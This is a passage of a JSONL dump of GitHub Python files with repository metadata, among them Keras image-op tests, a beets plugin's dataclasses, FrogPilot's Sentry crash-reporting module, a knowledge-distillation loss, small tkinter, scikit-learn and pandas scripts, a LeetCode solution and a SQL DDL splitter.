data_format):\n if backend.backend() == \"torch\":\n if \"lanczos\" in interpolation:\n self.skipTest(\n \"Resizing with Lanczos interpolation is \"\n \"not supported by the PyTorch backend. \"\n f\"Received: interpolation={interpolation}.\"\n )\n if interpolation == \"bicubic\" and antialias is False:\n self.skipTest(\n \"Resizing with Bicubic interpolation in \"\n \"PyTorch backend produces noise. Please \"\n \"turn on anti-aliasing. \"\n f\"Received: interpolation={interpolation}, \"\n f\"antialias={antialias}.\"\n )\n # Unbatched case\n if data_format == \"channels_first\":\n x = np.random.random((3, 50, 50)) * 255\n else:\n x = np.random.random((50, 50, 3)) * 255\n out = kimage.resize(\n x,\n size=(25, 25),\n interpolation=interpolation,\n antialias=antialias,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (1, 2, 0))\n ref_out = tf.image.resize(\n x, size=(25, 25), method=interpolation, antialias=antialias\n )\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (2, 0, 1))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n self.assertAllClose(ref_out, out, atol=0.3)\n\n # Batched case\n if data_format == \"channels_first\":\n x = np.random.random((2, 3, 50, 50)) * 255\n else:\n x = np.random.random((2, 50, 50, 3)) * 255\n out = kimage.resize(\n x,\n size=(25, 25),\n interpolation=interpolation,\n antialias=antialias,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (0, 2, 3, 1))\n ref_out = tf.image.resize(\n x, size=(25, 25), method=interpolation, antialias=antialias\n )\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (0, 3, 1, 2))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n self.assertAllClose(ref_out, out, atol=0.3)\n\n @parameterized.parameters(\n [\n (\"bilinear\", \"constant\", \"channels_last\"),\n (\"nearest\", \"constant\", \"channels_last\"),\n (\"bilinear\", \"nearest\", \"channels_last\"),\n (\"nearest\", \"nearest\", \"channels_last\"),\n (\"bilinear\", \"wrap\", \"channels_last\"),\n (\"nearest\", \"wrap\", \"channels_last\"),\n (\"bilinear\", \"reflect\", \"channels_last\"),\n (\"nearest\", \"reflect\", \"channels_last\"),\n (\"bilinear\", \"constant\", \"channels_first\"),\n ]\n )\n def test_affine_transform(self, interpolation, fill_mode, data_format):\n if fill_mode == \"wrap\" and backend.backend() == \"torch\":\n self.skipTest(\n \"Applying affine transform with fill_mode=wrap is not supported\"\n \" in the torch backend\"\n )\n if fill_mode == \"wrap\" and backend.backend() in (\"jax\", \"numpy\"):\n self.skipTest(\n \"The numerical results of applying affine transform with \"\n \"fill_mode=wrap in tensorflow are inconsistent with the jax and \"\n \"numpy backends\"\n )\n\n # Unbatched case\n if data_format == \"channels_first\":\n x = np.random.random((3, 50, 50)) * 255\n else:\n x = np.random.random((50, 50, 3)) * 255\n transform = np.random.random(size=(6))\n transform = np.pad(transform, (0, 2)) # makes c0, c1 always 0\n out = kimage.affine_transform(\n x,\n transform,\n interpolation=interpolation,\n fill_mode=fill_mode,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (1, 2, 0))\n ref_out = tf.raw_ops.ImageProjectiveTransformV3(\n images=tf.expand_dims(x, axis=0),\n transforms=tf.cast(tf.expand_dims(transform, axis=0), tf.float32),\n output_shape=tf.shape(x)[:-1],\n fill_value=0,\n interpolation=interpolation.upper(),\n fill_mode=fill_mode.upper(),\n )\n ref_out = 
ref_out[0]\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (2, 0, 1))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n if backend.backend() == \"torch\":\n # TODO: cannot pass with torch backend\n with self.assertRaises(AssertionError):\n self.assertAllClose(ref_out, out, atol=0.3)\n else:\n self.assertAllClose(ref_out, out, atol=0.3)\n\n # Batched case\n if data_format == \"channels_first\":\n x = np.random.random((2, 3, 50, 50)) * 255\n else:\n x = np.random.random((2, 50, 50, 3)) * 255\n transform = np.random.random(size=(2, 6))\n transform = np.pad(transform, [(0, 0), (0, 2)]) # makes c0, c1 always 0\n out = kimage.affine_transform(\n x,\n transform,\n interpolation=interpolation,\n fill_mode=fill_mode,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (0, 2, 3, 1))\n ref_out = tf.raw_ops.ImageProjectiveTransformV3(\n images=x,\n transforms=tf.cast(transform, tf.float32),\n output_shape=tf.shape(x)[1:-1],\n fill_value=0,\n interpolation=interpolation.upper(),\n fill_mode=fill_mode.upper(),\n )\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (0, 3, 1, 2))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n if backend.backend() == \"torch\":\n # TODO: cannot pass with torch backend\n with self.assertRaises(AssertionError):\n self.assertAllClose(ref_out, out, atol=0.3)\n else:\n self.assertAllClose(ref_out, out, atol=0.3)\n\n @parameterized.parameters(\n [\n ((5, 5), None, 1, \"valid\", \"channels_last\"),\n ((3, 3), (2, 2), 1, \"valid\", \"channels_last\"),\n ((5, 5), None, 1, \"valid\", \"channels_first\"),\n ((3, 3), (2, 2), 1, \"valid\", \"channels_first\"),\n ((5, 5), None, 1, \"same\", \"channels_last\"),\n ((3, 3), (2, 2), 1, \"same\", \"channels_last\"),\n ((5, 5), None, 1, \"same\", \"channels_first\"),\n ((3, 3), (2, 2), 1, \"same\", \"channels_first\"),\n ((5, 5), (1, 1), 3, \"same\", \"channels_first\"),\n ((5, 5), (2, 2), 3, \"same\", \"channels_first\"),\n ((5, 5), (2, 2), 3, \"same\", \"channels_last\"),\n ]\n )\n def test_extract_patches(\n self, size, strides, dilation_rate, padding, data_format\n ):\n if (\n data_format == \"channels_first\"\n and backend.backend() == \"tensorflow\"\n ):\n pytest.skip(\"channels_first unsupported on CPU with TF\")\n\n if (\n isinstance(strides, tuple)\n and backend.backend() == \"tensorflow\"\n and dilation_rate > 1\n ):\n pytest.skip(\n \"dilation_rate>1 with strides>1 is not supported with TF\"\n )\n if data_format == \"channels_first\":\n image = np.random.uniform(size=(1, 3, 20, 20))\n else:\n image = np.random.uniform(size=(1, 20, 20, 3))\n patch_h, patch_w = size[0], size[1]\n if strides is None:\n strides_h, strides_w = patch_h, patch_w\n else:\n strides_h, strides_w = strides[0], strides[1]\n\n patches_out = kimage.extract_patches(\n backend.convert_to_tensor(image, dtype=\"float32\"),\n size=size,\n strides=strides,\n dilation_rate=dilation_rate,\n padding=padding,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n patches_out = backend.numpy.transpose(\n patches_out, axes=[0, 2, 3, 1]\n )\n if data_format == \"channels_first\":\n image = np.transpose(image, [0, 2, 3, 1])\n patches_ref = tf.image.extract_patches(\n image,\n sizes=(1, patch_h, patch_w, 1),\n strides=(1, strides_h, strides_w, 1),\n rates=(1, dilation_rate, dilation_rate, 1),\n padding=padding.upper(),\n )\n self.assertEqual(tuple(patches_out.shape), tuple(patches_ref.shape))\n self.assertAllClose(\n patches_ref.numpy(), 
backend.convert_to_numpy(patches_out), atol=0.3\n )\n","repo_name":"hertschuh/keras-core","sub_path":"keras_core/ops/image_test.py","file_name":"image_test.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"670434363","text":"\"\"\" Dataclasses for Filetote representing Settings/Config-related content along with\ndata used in processing extra files/artifacts. \"\"\"\n\nfrom dataclasses import asdict, dataclass, field\nfrom sys import version_info\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom beets.library import Library\nfrom beets.util import MoveOperation\n\nfrom .mapping_model import FiletoteMappingModel\n\nif version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal # type: ignore # pylint: disable=import-error\n\n\n@dataclass\nclass FiletoteArtifact:\n \"\"\"An individual FileTote Artifact item for processing.\"\"\"\n\n path: str\n paired: bool\n\n\n@dataclass\nclass FiletoteArtifactCollection:\n \"\"\"An individual FileTote Item collection for processing.\"\"\"\n\n artifacts: List[FiletoteArtifact]\n mapping: FiletoteMappingModel\n source_path: str\n\n\n@dataclass\nclass FiletoteSessionData:\n \"\"\"Configuration settings for FileTote Item.\"\"\"\n\n operation: Optional[MoveOperation] = None\n beets_lib: Optional[Library] = None\n import_path: Optional[bytes] = None\n\n def adjust(self, attr: str, value: Any) -> None:\n \"\"\"Adjust provided attribute of class with provided value.\"\"\"\n setattr(self, attr, value)\n\n\n@dataclass\nclass FiletotePairingData:\n \"\"\"Configuration settings for FileTote Pairing.\"\"\"\n\n enabled: bool = False\n pairing_only: bool = False\n extensions: Union[Literal[\".*\"], List[str]] = \".*\"\n\n\n@dataclass\nclass FiletoteConfig:\n \"\"\"Configuration settings for FileTote Item.\"\"\"\n\n # pylint: disable=too-many-instance-attributes\n\n session: FiletoteSessionData = field(default_factory=FiletoteSessionData)\n extensions: Union[Literal[\"\"], List[str]] = \"\"\n filenames: Union[Literal[\"\"], List[str]] = \"\"\n patterns: Dict[str, List[str]] = field(default_factory=dict)\n exclude: Union[Literal[\"\"], List[str]] = \"\"\n pairing: FiletotePairingData = field(default_factory=FiletotePairingData)\n paths: Dict[str, str] = field(default_factory=dict)\n print_ignored: bool = False\n\n def asdict(self) -> dict: # type: ignore[type-arg]\n \"\"\"Returns a `dict` version of the dataclass.\"\"\"\n return asdict(self)\n\n def adjust(self, attr: str, value: Any) -> None:\n \"\"\"Adjust provided attribute of class with provided value. 
For the `pairing`\n property, use the `FiletotePairingData` dataclass and expand the incoming dict\n to arguments.\"\"\"\n if attr == \"pairing\":\n value = FiletotePairingData(**value)\n setattr(self, attr, value)\n","repo_name":"gtronset/beets-filetote","sub_path":"beetsplug/filetote_dataclasses.py","file_name":"filetote_dataclasses.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"27987473211","text":"\"\"\"Install exception handler for process crash.\"\"\"\nimport requests\nimport os\nimport sentry_sdk\nimport traceback\nfrom enum import Enum\nfrom sentry_sdk.integrations.threading import ThreadingIntegration\n\nfrom cereal import car\nfrom common.params import Params\nfrom datetime import datetime\nfrom selfdrive.athena.registration import is_registered_device\nfrom system.hardware import HARDWARE, PC\nfrom system.swaglog import cloudlog\nfrom system.version import get_branch, get_commit, get_origin, get_version, \\\n is_comma_remote, is_dirty, is_tested_branch\n\n\nclass SentryProject(Enum):\n # python project\n SELFDRIVE = \"https://5ad1714d27324c74a30f9c538bff3b8d@o4505034923769856.ingest.sentry.io/4505034930651136\"\n # native project\n SELFDRIVE_NATIVE = \"https://5ad1714d27324c74a30f9c538bff3b8d@o4505034923769856.ingest.sentry.io/4505034930651136\"\n\nCRASHES_DIR = '/data/community/crashes'\nret = car.CarParams.new_message()\ncandidate = ret.carFingerprint\nparams = Params()\ntry:\n dongle_id = params.get(\"DongleId\").decode('utf8')\nexcept AttributeError:\n dongle_id = \"None\"\ntry:\n updated = params.get(\"Updated\", encoding='utf-8')\nexcept Exception:\n updated = \"\"\ntry:\n installed = params.get(\"InstallDate\", encoding='utf-8')\nexcept Exception:\n installed = \"\"\nerror_tags = {'dongle_id': dongle_id, 'branch': get_branch(), 'remote': get_origin(), 'fingerprintedAs': candidate, 'updated': updated}\n\n\ndef report_tombstone(fn: str, message: str, contents: str) -> None:\n cloudlog.error({'tombstone': message})\n\n with sentry_sdk.configure_scope() as scope:\n scope.set_extra(\"tombstone_fn\", fn)\n scope.set_extra(\"tombstone\", contents)\n sentry_sdk.capture_message(message=message)\n sentry_sdk.flush()\n\n\ndef capture_exception(*args, **kwargs) -> None:\n save_exception(traceback.format_exc())\n cloudlog.error(\"crash\", exc_info=kwargs.get('exc_info', 1))\n\n try:\n sentry_sdk.capture_exception(*args, **kwargs)\n sentry_sdk.flush() # https://github.com/getsentry/sentry-python/issues/291\n except Exception:\n cloudlog.exception(\"sentry exception\")\n\ndef save_exception(exc_text):\n if not os.path.exists(CRASHES_DIR):\n os.makedirs(CRASHES_DIR)\n\n log_file = '{}/{}'.format(CRASHES_DIR, datetime.now().strftime('%m-%d-%Y--%I:%M.%S-%p.log'))\n log_file_2 = f'{CRASHES_DIR}/error.txt'\n with open(log_file, 'w') as f:\n f.write(exc_text)\n f.close()\n with open(log_file_2, 'w') as f2:\n f2.write(exc_text)\n f2.close()\n print('Logged current crash to {}'.format(log_file))\n\ndef bind_user(**kwargs) -> None:\n sentry_sdk.set_user(kwargs)\n sentry_sdk.flush()\n\ndef capture_warning(warning_string):\n bind_user(id=dongle_id)\n sentry_sdk.capture_message(warning_string, level='warning')\n sentry_sdk.flush()\n\ndef capture_info(info_string):\n bind_user(id=dongle_id)\n sentry_sdk.capture_message(info_string, level='info')\n sentry_sdk.flush()\n\ndef set_tag(key: str, value: str) -> None:\n sentry_sdk.set_tag(key, value)\n sentry_sdk.flush()\n\n\ndef init(project: 
SentryProject) -> None:\n # forks like to mess with this, so double check\n comma_remote = is_comma_remote() and \"FrogAi\" in get_origin(default=\"\")\n if not comma_remote or not is_registered_device() or PC:\n return\n\n env = \"release\" if is_tested_branch() else \"master\"\n dongle_id = Params().get(\"DongleId\", encoding='utf-8')\n updated = params.get(\"Updated\", encoding='utf-8')\n installed = params.get(\"InstallDate\", encoding='utf-8')\n\n integrations = []\n if project == SentryProject.SELFDRIVE:\n integrations.append(ThreadingIntegration(propagate_hub=True))\n else:\n sentry_sdk.utils.MAX_STRING_LENGTH = 8192\n\n sentry_sdk.init(project.value,\n default_integrations=False,\n release=get_version(),\n integrations=integrations,\n traces_sample_rate=1.0,\n environment=env)\n\n sentry_sdk.set_user({\"id\": dongle_id})\n sentry_sdk.set_tag(\"origin\", get_origin())\n sentry_sdk.set_tag(\"branch\", get_branch())\n sentry_sdk.set_tag(\"commit\", get_commit())\n sentry_sdk.set_tag(\"updated\", updated)\n sentry_sdk.set_tag(\"installed\", installed)\n\n if project == SentryProject.SELFDRIVE:\n sentry_sdk.Hub.current.start_session()\n","repo_name":"iambluefred/FrogPilot","sub_path":"selfdrive/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"74232913643","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .basic_distiller import BasicDistiller\n\ndef dkd_loss(logits_student, logits_teacher, target, alpha, beta, temperature):\n gt_mask = _get_gt_mask(logits_student, target)\n other_mask = _get_other_mask(logits_student, target)\n pred_student = F.softmax(logits_student / temperature, dim=1)\n pred_teacher = F.softmax(logits_teacher / temperature, dim=1)\n pred_student = cat_mask(pred_student, gt_mask, other_mask)\n pred_teacher = cat_mask(pred_teacher, gt_mask, other_mask)\n log_pred_student = torch.log(pred_student)\n tckd_loss = (\n F.kl_div(log_pred_student, pred_teacher, size_average=False)\n * (temperature**2)\n / target.shape[0]\n )\n pred_teacher_part2 = F.softmax(\n logits_teacher / temperature - 1000.0 * gt_mask, dim=1\n )\n log_pred_student_part2 = F.log_softmax(\n logits_student / temperature - 1000.0 * gt_mask, dim=1\n )\n nckd_loss = (\n F.kl_div(log_pred_student_part2, pred_teacher_part2, size_average=False)\n * (temperature**2)\n / target.shape[0]\n )\n return alpha * tckd_loss + beta * nckd_loss\n\n\ndef _get_gt_mask(logits, target):\n target = target.reshape(-1)\n mask = torch.zeros_like(logits).scatter_(1, target.unsqueeze(1), 1).bool()\n return mask\n\n\ndef _get_other_mask(logits, target):\n target = target.reshape(-1)\n mask = torch.ones_like(logits).scatter_(1, target.unsqueeze(1), 0).bool()\n return mask\n\n\ndef cat_mask(t, mask1, mask2):\n t1 = (t * mask1).sum(dim=1, keepdims=True)\n t2 = (t * mask2).sum(1, keepdims=True)\n rt = torch.cat([t1, t2], dim=1)\n return rt\n\n\nclass DKD(BasicDistiller):\n \"\"\"Decoupled Knowledge Distillation(CVPR 2022)\"\"\"\n def __init__(self, pretrained_model, alpha, beta, temperature, warmup, is_frozen=True, use_saved_logits=True, topk=0, num_classes=10, teacher_type=None):\n ''' Init method.\n\n :param pretrained_model: the pretrained model as teacher\n :param alpha: the alpha for DKD \n :param beta: the beta for DKD \n :param temperature: the temperature for DKD \n :param warmup: warmup epoches for DKD\n :param is_frozen: whether frozen teacher when training\n 
:param use_saved_logits: whether to train with pre-saved logits\n :param topk: if using saved logits, save the top k logits; 0 means save all logits\n :param num_classes: number of classification classes\n :param teacher_type: teacher model type\n '''\n super(DKD, self).__init__(pretrained_model, is_frozen, use_saved_logits, topk, num_classes, teacher_type)\n self.alpha = alpha\n self.beta = beta\n self.temperature = temperature\n self.warmup = warmup\n\n def loss(self,teacher_logits, student_logits,**kwargs):\n ''' Loss function.\n\n :param teacher_logits: the teacher logits\n :param student_logits: the student logits\n '''\n distiller_loss = min(kwargs[\"epoch\"] / self.warmup, 1.0) * dkd_loss(\n student_logits, teacher_logits,kwargs[\"target\"],\n self.alpha, self.beta, self.temperature,)\n return distiller_loss\n","repo_name":"intel/e2eAIOK","sub_path":"e2eAIOK/ModelAdapter/engine_core/distiller/dkd.py","file_name":"dkd.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"3744926991","text":"import time\r\nimport tkinter.ttk as ttk\r\nfrom tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Mov GUI\")\r\nroot.geometry(\"320x240\")\r\n####################################\r\n\r\n# # progressbar = ttk.Progressbar(root, maximum=100, mode=\"indeterminate\")\r\n# # # indeterminate : runs indefinitely\r\n# progressbar = ttk.Progressbar(root, maximum=100, mode=\"determinate\")\r\n# # determinate : fill from 0 to 100\r\n\r\n\r\n\r\n# progressbar.start(10) # 10ms moving\r\n# progressbar.pack()\r\n\r\n####################################\r\n# def btncmd():\r\n# progressbar.stop()\r\n####################################\r\n# btn = Button(root, text=\"Stop\", command=btncmd)\r\n# btn.pack()\r\n\r\n\r\n\r\np_var2 = DoubleVar()\r\nprogressbar2 = ttk.Progressbar(root, maximum=100, length=150, variable=p_var2)\r\nprogressbar2.pack()\r\n\r\n\r\ndef btncmd2():\r\n for i in range(1, 101):\r\n time.sleep(0.01) # 0.01 second\r\n\r\n p_var2.set(i) # progress value set\r\n progressbar2.update() # ui update\r\n \r\n\r\n\r\n if i == 20 or i == 50:\r\n print(\"completed {}%\".format(i))\r\n elif i == 100:\r\n print(\"Done {}%\".format(i))\r\n \r\nbtn2 = Button(root, text=\"Start\", command=btncmd2)\r\nbtn2.pack()\r\n\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"yacmov/Self_Study_Python","sub_path":"03_GUI/01_GUI_basic/09_Progressbar.py","file_name":"09_Progressbar.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44637970646","text":"import pandas as pd\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.linear_model import LogisticRegression\r\nimport joblib\r\nimport nltk\r\nnltk.download('stopwords')\r\n# Printing the stopwords in English\r\n\r\n# print(stopwords.words('english'))\r\n\r\n# Loading the dataset to a pandas DataFrame\r\nnews_dataset = pd.read_csv('C:\\\\Users\\\\Arjit\\\\Desktop\\\\train.csv')\r\n\r\n# news_dataset.shape\r\n# print the first 5 rows of the dataframe\r\nnews_dataset.head()\r\n\r\n# counting the number of missing values in the dataset\r\nnews_dataset.isnull().sum()\r\n\r\n# replacing the null values with empty string\r\nnews_dataset = news_dataset.fillna('')\r\n\r\n# merging the author name and news title\r\nnews_dataset['content'] = news_dataset['author']+' 
'+news_dataset['title']\r\n\r\n# separating the data & label\r\nX = news_dataset.drop(columns='label', axis=1)\r\nY = news_dataset['label']\r\n\r\nport_stem = PorterStemmer()\r\n\r\n\r\ndef stemming(content):\r\n stemmed_content = re.sub('[^a-zA-Z]', ' ', content)\r\n stemmed_content = stemmed_content.lower()\r\n stemmed_content = stemmed_content.split()\r\n stemmed_content = [port_stem.stem(word) for word in stemmed_content if word not in stopwords.words('english')]\r\n stemmed_content = ' '.join(stemmed_content)\r\n return stemmed_content\r\n\r\n\r\nnews_dataset['content'] = news_dataset['content'].apply(stemming)\r\n\r\n# noinspection PyRedeclaration\r\nX = news_dataset['content'].values\r\n# noinspection PyRedeclaration\r\nY = news_dataset['label'].values\r\n\r\n# converting the textual data to numerical data\r\nvectorizer = TfidfVectorizer()\r\nvectorizer.fit(X)\r\n\r\nX = vectorizer.transform(X)\r\n\r\nmodel = LogisticRegression()\r\nmodel = model.fit(X, Y)\r\njoblib.dump(model, 'news_model')\r\njoblib.dump(vectorizer, 'vectorizer.pkl')\r\n","repo_name":"arjitgupta00/Fake-News-Detection-Model","sub_path":"Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39461719412","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n'''\nStrategy: BFS traversal of a tree. Construct the next level to explore base on the children of the current level and include Nulls.\nWhile exploring a level also keep track of its width.\n The existence of a node creates a width of 1. Gaps of null children are fine if they end up being enclosed.\n Need a little algorithm to return the width of a layer given its\n\nThere's a question about counting Nulls here that I don't have an answer for that would change everything.\nDo you count all actual Nulls or the possible Nulls in the middle? Yes you do. E.g. 
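(the positional indexing below, with child slots 2*i and 2*i+1, counts these implicit null gaps) 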
[1,3,2,5,null,null,9,6,null,null,7]\ngives 8 instead of 4\n'''\n\n\nclass Solution:\n def widthOfBinaryTree(self, root):\n level = [(root, 0)]\n max_width = 0\n while len(level) > 0:\n next_level = []\n left = -1\n width = 0\n for node in level:\n # Track width \n if node[0] is not None:\n if left == -1:\n left = node[1]\n width = node[1] - left + 1\n \n next_level.append((node[0].left, 2*node[1]))\n next_level.append((node[0].right, 2*node[1]+1))\n level = next_level\n if width > max_width:\n max_width = width\n return max_width\n\n\n # Create next level\n\nif __name__ == \"__main__\":\n sol = Solution()\n \n t6 = TreeNode(9)\n t5 = TreeNode(3)\n t4 = TreeNode(5)\n\n t2 = TreeNode(3, t4, t5)\n t3 = TreeNode(2, None, t6)\n\n t1 = TreeNode(1, t2, t3)\n\n print(sol.widthOfBinaryTree(t1))","repo_name":"drewserles/LeetCodeChallenges","sub_path":"601-700/p662.py","file_name":"p662.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26095343440","text":"import pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n#reading in the data\r\ndef create_panda_frame(filename):\r\n \"\"\"create panda dataframe of csv file with ';' as separator\"\"\"\r\n with open(filename, encoding='utf-8') as datafile:\r\n df = pd.read_csv(datafile, index_col=0, sep=';')\r\n return df\r\n\r\nstudent_dataframe = create_panda_frame('student_data.csv')\r\n\r\n#plot how many students were enrolled in which year\r\ndata1 = create_panda_frame('student_data.csv')\r\ndf = data1.groupby('Year')[[\"Master\", \"Bachelor\", \"Doctorate\"]].sum()\r\n\r\nsns.lineplot(data=df, palette = \"dark\")\r\nplt.title(\"Students\")\r\nplt.show()\r\n\r\n#plotting student of the year 2021/22\r\ndata1 = create_panda_frame('student_data.csv')\r\nyear = data1.loc['2021/22']\r\nyear.groupby(by = 'ISCED Field', as_index = False).sum()\r\nyear = year.assign(Sum = year['Bachelor'] + year[\"Master\"] + year[\"Doctorate\"])\r\nsns.set(rc = {'figure.figsize':(10,20)})\r\nax = sns.barplot(x=\"Sum\", y=\"ISCED Field\", data=year, ci = None)\r\n\r\n#gender distribution of students in humanities fields\r\ndata2 = pd.read_csv(\"student_data.csv\", encoding = \"utf-8\", sep=';')\r\ncomparison = data2[data2[\"ISCED Field\"].isin([\"Political sciences and civics\", \"Psychology\",\r\n \"History and archaeology\", \"Economics\", \"Law\"])]\r\ncomparison['Number of students'] = comparison.sum(axis=1)\r\ncomparison = comparison.loc[:, ~comparison.columns.isin(['Bachelor', 'Master', \"Doctorate\"])]\r\nprint(comparison)\r\n\r\n\r\nplot = sns.FacetGrid(data = comparison, col = \"Sex\", hue = \"ISCED Field\", palette = \"tab10\")\r\nplot.map(sns.lineplot, \"Year\", \"Number of students\")\r\nplot.add_legend()\r\n\r\nplot.set_xticklabels(rotation=45)\r\nplt.show()","repo_name":"Hiraiu/DataExploration","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38606503848","text":"#!/usr/bin/env python\n\nimport re\nimport os\nimport errno\nimport sys\nimport glob\nfrom argparse import ArgumentParser\n\ndef write_data_to_file(folder,file_name, list_data):\n if not os.path.exists(\"./\"+folder):\n try:\n os.makedirs(\"./\"+folder)\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n with open(\"./\"+ folder + \"/\" + file_name + \".sql\", 'a+') as my_file:\n my_file.writelines(list_data)\n 
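# NOTE: 'a+' opens in append mode, so successive DDL chunks for the same object accumulate in one file.\n 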
my_file.close()\n\ndef write_ddl_to_file(x,y,lines,f_extns,extn):\n if x != 0 :\n match = re.findall(r\"CREATE (.*)\", str(lines[y]))\n if match:\n file=str(match).split() \n if file[1] == \"REPLACE\" :\n file_name = file[3].strip().replace(\";\\']\",\"\")\n else:\n file_name = file[1].strip().replace(\";\\']\",\"\")\n file_name = file_name.replace(f_extns[0] + \".\",\"\")\n if y == x-1 :\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y])\n else:\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y: x-1])\n match = re.findall(r\"DROP (.*)\", str(lines[y]))\n if match:\n file=str(match).split() \n file_name = file[1].strip().replace(\";\\']\",\"\")\n file_name = file_name.replace(f_extns[0] + \".\",\"\")\n if y == x-1 :\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y])\n else:\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y: x-1])\n\ndef convert_semi_to_newline(filename): \n localFile = open(filename, 'r')\n data=localFile.read()\n data = data.replace(';',';\\n') \n data = data.replace('\"','') \n fin = open(filename, \"wt\")\n fin.write(data)\n fin.close()\n f_extns = filename.split(\".\")\n with open(filename) as f:\n count = sum(1 for _ in f)\n localFile = open(filename, 'r')\n lines = localFile.readlines()\n return [filename , lines , count, f_extns]\n\ndef check_table_view(lines,f_extns,extn,count):\n line_numbers = 0\n x = 0\n y = 0\n z = 0\n for line in lines:\n if '-- DDL Statements for Table' in line:\n del lines[line_numbers]\n \n if 'DROP TABLE' in line or 'DROP VIEW' in line:\n y = x\n x = line_numbers\n write_ddl_to_file(x,y,lines,f_extns,extn) \n\n if 'CREATE TABLE' in line or 'CREATE VIEW' in line or 'CREATE OR REPLACE' in line: \n \n if 'CREATE' in lines[z]:\n y = x\n x = line_numbers\n write_ddl_to_file(x,y,lines,f_extns,extn)\n else:\n z = line_numbers \n\n line_numbers = line_numbers+1\n write_ddl_to_file(count,x,lines,f_extns,extn)\n\n\ndef create_files_using_file(filename):\n responseData=convert_semi_to_newline(filename)\n filename=responseData[0]\n lines=responseData[1]\n count=responseData[2]\n f_extns=responseData[3]\n extn=\"\"\n check_table_view(lines,f_extns,extn,count)\n \ndef create_files_using_directory(directory):\n if not os.path.exists(\"./Output/\"):\n try:\n os.makedirs(\"./Output\")\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n filenames= glob.glob('./' + directory + '/*.*') \n for filename in filenames: \n f=open(filename, 'r') \n directory, folder=os.path.split(filename)\n print(filename)\n f.read()\n f.close() \n f_extns = folder.split(\".\")\n extn=\"./Output/\" \n responseData=convert_semi_to_newline(filename)\n filename=responseData[0]\n lines=responseData[1]\n count=responseData[2] \n check_table_view(lines,f_extns,extn,count)\n\ndef main(args=sys.argv[1:]):\n _arguments_check(args)\n # print(len(args))\n # for index,arg in enumerate(args):\n # if '-f' in arg:\n # create_files_using_file(args[index+1])\n # if '-D' in arg:\n # create_files_using_directory(args[index+1])\n\n''' ------------------------------------------------------------------------- '''\n\n\ndef _read_args(call_args):\n parser = ArgumentParser('dbsplitsql')\n parser.add_argument('-f', '--file', dest='file',\n action='store_true', default=False,\n help='Process sql file.')\n parser.add_argument('-d', '--directory', dest='directory',\n action='store_true', default=False,\n help='Process sql files found in directory & subdirectories.')\n parser.add_argument('--version', action='version',\n version='dbsplitsql 
0.0.8')\n args, _unused_unknown_args = parser.parse_known_args(call_args)\n return args\n\n\ndef _show_exception(message):\n print(\"Error: \" + message)\n os._exit(1)\n\n\ndef _arguments_check(args=sys.argv[1:]):\n read_args = _read_args(args)\n\n ''' check for either file or directory input '''\n if not (read_args.file or read_args.directory):\n _show_exception(\"Pass SQL File/Directory with respective flags.\")\n\n if read_args.file:\n file_index = args.index(\"-f\")\n try:\n file_name = args[file_index + 1]\n if not file_name:\n _show_exception(\"Input valid .sql file\")\n else:\n create_files_using_file(file_name)\n except:\n _show_exception(\"Input valid .sql file\")\n\n if read_args.directory:\n directory_index = args.index(\"-d\")\n try:\n d_name = args[directory_index + 1]\n if not d_name:\n _show_exception(\"Input directory.\")\n else:\n create_files_using_directory(d_name)\n except:\n _show_exception(\"Input directory.\")\n\n\nif __name__ == \"__main__\":\n 